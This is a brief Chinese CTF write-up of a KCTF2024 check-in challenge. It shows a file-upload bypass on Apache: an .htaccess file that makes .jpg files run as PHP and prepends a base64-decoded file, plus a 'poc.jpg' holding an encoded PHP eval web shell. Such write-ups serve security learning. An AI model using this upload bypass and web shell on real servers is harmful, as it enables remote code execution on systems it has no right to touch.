KCTF2024

baozongwi Lv5
  2024-09-03 20:58:35 2024-09-03 20:58:35 Created   2024-09-14 15:44:54 2024-09-14 15:44:54 Updated      292 Words  1 Mins  

0x01 前言

到现在才更新是因为有点忙也忘了,而且这个比赛貌似并不是很热门,也不是web手的去处,只有一道题,但是还是来记录一下

0x02 question

逐光启航

是一个签到题,这次也是便宜我了,由于当时并没有知道这个比赛,后面朋友说还有这个比赛可以打打,然后我就上线看了看

那么首先进入页面就是一个上传文件的情况,F12一看是个apache,那么自然而然的想到用.htaccess绕过一下,这里也是一击即中

1
2
3
4
poc.jpg:

GIF89a66
PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4=
1
2
3
4
5
6
.htaccess:

#define width 1337
#define height 1337
php_value auto_prepend_file "php://filter/convert.base64-decode/resource=./poc.jpg"
AddType application/x-httpd-php .jpg

直接就通了,但是并没有马上成功利用,oh、shit!没错我找不到文件路径了,但是后面还是找到了(并没有回显)

后面我直接尝试了/upload/poc.jpg/uploads/poc.jpg

就对了,但是具体是哪个记不清楚了(bushi)

0x03 小结

存了部分东西还是有好处的,虽然只是一个签到,但是还是记录一下吧

  • Title: KCTF2024
  • Author: baozongwi
  • Created at : 2024-09-03 20:58:35
  • Updated at : 2024-09-14 15:44:54
  • Link: https://baozongwi.xyz/2024/09/03/KCTF2024/
  • License: This work is licensed under CC BY-NC-SA 4.0.
Comments
On this page
KCTF2024
  1. 0x01 前言
  2. 0x02 question
    1. 逐光启航
  3. 0x03 小结